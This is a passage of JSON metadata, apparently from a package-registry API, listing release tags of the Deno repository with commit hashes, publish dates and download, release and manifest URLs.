ste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/de